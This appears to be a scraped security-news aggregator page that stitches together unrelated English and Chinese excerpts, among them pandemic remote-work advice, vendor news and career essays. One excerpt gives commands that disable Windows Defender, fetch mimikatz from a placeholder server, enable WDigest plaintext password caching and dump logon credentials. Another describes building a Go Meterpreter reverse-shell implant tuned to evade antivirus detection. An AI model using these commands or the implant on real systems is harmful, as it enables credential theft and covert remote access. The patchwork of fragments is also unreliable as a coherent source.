Aggregator

Expect COVID-19 (Coronavirus) to touch your organization soon, if it hasn’t already. You need to be ready for shortages, slowdowns, absent personnel, and a high percentage of concurrent remote access workers.

By now, we are all subject in one way or another to the far-reaching impact of COVID-19. As we see on the news each day, the numbers of those infected by this deadly coronavirus continue to grow in terrifying increments. And even for those of us without family members or friends directly impacted by the virus, life has profoundly changed.

临时禁止Windows Defender

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f gpupdate /force

下载mimikatz后解压缩。

powershell.exe -NoP -NonI -Exec Bypass -Command "& {Import-Module BitsTransfer; Start-BitsTransfer 'http://你的服务器/mimikatz_trunk.zip' "%APPDATA%\mimikatz_trunk.zip"}"

修改注册表开启UseLogonCredential

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

等用户下次再登录的时候,可抓到明文密码

mimikatz.exe privilege::debug sekurlsa::logonpasswords exit

小B接到一个渗透测试任务，由于很久没有从乙方视⻆执行渗透测试的他决定先梳理一下自己的思路。

This week we?re announcing two new capabilities in our Centra Security Platform that further deliver on that mission: Support for cloud-native resources and AI-powered segmentation.

The Summary of the 2019 F5 Labs TLS Telemetry Report expands the scope of our research to bring deeper insights into encryption on the web, including ciphers, SSL/TLS versions, and digital certificates.

庚子之年，回首过去入安全这行已16年，从小兵到负责集团安全，还记得第一次面试时的忐忑，担心经验不够，无法证明

今天这篇文章没有太多的技术细节，也可能会让你觉得很枯燥，甚至连文章的标题我都懒得起，但是我觉得如果你实在无聊也可以读一读，或许给你些许启发。

以色列，不到900万的人口，却拥有着近500家的网络安全公司，每年网络安全产业的融资规模仅次于美国，它所孕育

最近一直在深思几个词：“竞争力”，“核心竞争力”等是什么？如何提高自己的“竞争力”等问题。

百度百科是这样解释的：
核心竞争力是指能够为企业带来比较竞争优势的资源，以及资源的配置与整合方式。随着企业资源的变化以及配置与整合效率的提高，企业的核心竞争力也会随之发生变化。凭借着核心竞争力产生的动力，一个企业就有可能在激烈的市场竞争中脱颖而出，使产品和服务的价值在一定时期内得到提升。

维基百科是这样解释的：
竞争力，是对象在竞争中显示的能力。因此它是一种随着竞争变化着的有通过竞争而体现的能力。
竞争力包含在对象的现在，但它是对象未来可以展示的能力。要测定竞争力需要确定一个测定目标时间。
要评价竞争力，需要确定一个比较竞争力的群体，根据目标时间在竞争群体中的表现评价它。测定和评价竞争力可以采用未来研究方法，但竞争力测定的是对象“现在”中包含的“未来”。

抽象以上概念，也就是”竞争力“的基础条件是2个对象，A与B，其中A是固定的值，B的取值范围是：A＞B（B无限趋近于正无穷），也就是说A的竞争力比B大。

反推以上概念，如果A要保持核心竞争力。而改变B的取值范围，公式如下：A＞B（0＜B≤1）的时候，就是A的核心竞争力对于B的竞争力是永恒的。

如果以上概念，晦涩难懂，以下以”财务自由“的概念套入：
严格意义来说：巴菲特是不是财务自由？需要考虑3个主要变量，分别是A,B,t。其中A是当下的收入，B是当下的支出，t是时间。当收入小于支出，随着t的值增大，那么财富就会减小。而t的取值范围则是：第一次初始收入≤t≤生命终止。

那么核心竞争力，同样需要考虑3个主要变量，A,B,s，其中A是固定的对象，B是对比的对象，s是增长速度。而永恒竞争力的公式如下：

A＞a（0＜a≤1），A是此刻的你，a是上一刻的你。也就是说，今天的你要优于昨天的你。不去对比，只与自己对比，并且永远大于上一刻的你，便是你自己的永恒核心竞争力，当变量S(A)＞S（B）[S为增长速度，A为你本身，B为对比对象]，便是你永恒竞争力。

Recruitment scams are a serious, but often overlooked risk to job seekers. Those responsible for these schemes often play on the victim's stress levels or professional ego, by using authority to offer something that could be life changing, often with large salaries. I've personally experienced a recruitment scam. In this post, we'll explore the scam that targeted me, and the steps I took that prevented me from becoming a victim.

一个小技巧，做个笔记吧

早晨6点多起床后，拿起手机看pei少发的现场视频，结合老于的数说直播，了2020的沙盒比赛情况。说心里话，如

We're all familiar with the problem of talent scarcity in cybersecurity. Shape Security's Jared Baker writes for Human Resources Director, discussing how veterans are often a perfect fit - if you seek them out.

最近CVE-2020-1938炒的比较热闹，前几天比较忙，今天抽空跟了一下这个漏洞，时间线上肯定比别的大佬晚很多了，所以就选择从环境搭建开始写的详细一点，对这个漏洞多少还有一些困惑的同学可以赏脸看上两眼吧。

总结一下遇到挖矿时应该如何做应急响应与溯源分析。

原文https://l3yx.github.io/2020/02/22/JDK7u21%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96Gadgets/#more 一开始是学习FastJson反序列化的POC，然后发现欠缺不少知识，遂来补一下，收获良多，总结下笔记 所谓JDK反

https://l3yx.github.io/

Golang实现的x86下的Meterpreter reverse tcp。地址：https://github.com/insightglacier/go_meterpreter

做静态免杀实验，代码修改自EGESPLOIT 这个开源项目。单独实现主要在于减小程序编译后体积。目前编译后的大小在1.2M左右。

使用方法

修改go_meterpreter.go中125行代码 s := "http://192.168.121.131:8989" IP和端口修改为自己的地址。然后就可以go build了。

set GOARCH=386 go build -ldflags="-H windowsgui -w"

注意上面参数中没有-s，因为实际测试，使用这种方式build后的程序免杀效果会好一些。如果直接go build，程序会有窗口，同时大小也在1.6M左右。

由于加入了这部分代码，运行后因为执行多次无用代码，需要等一会才可以看到上线。另外目前会出现连接两次msf的情况，但是只有一个连接会返回shell，目前没找到原因。

免杀效果

加入了Bypass AV的代码。

我在刚写好的时候上传到VT，查杀结果位8/62。VT上有超过70个引擎，62个应该是加入BypassAV代码起的作用。

今天最新经过编译查杀结果为20/70。由于现在杀毒都有云查杀，刚写的时候效果好，但是过几天就被被杀。这里具体可以结合一些其他方式来尝试绕过。

VT检测结果地址：https://www.virustotal.com/gui/file/f8ff4acac418e6cdc326d0139ba2bdb9fce32558985962cf8303fcc97b9e47fb/detection

在使用这个的过程中，Windows10中自带的杀毒软件会拦截。会被动态行为发现。这里仅是过静态查杀测试。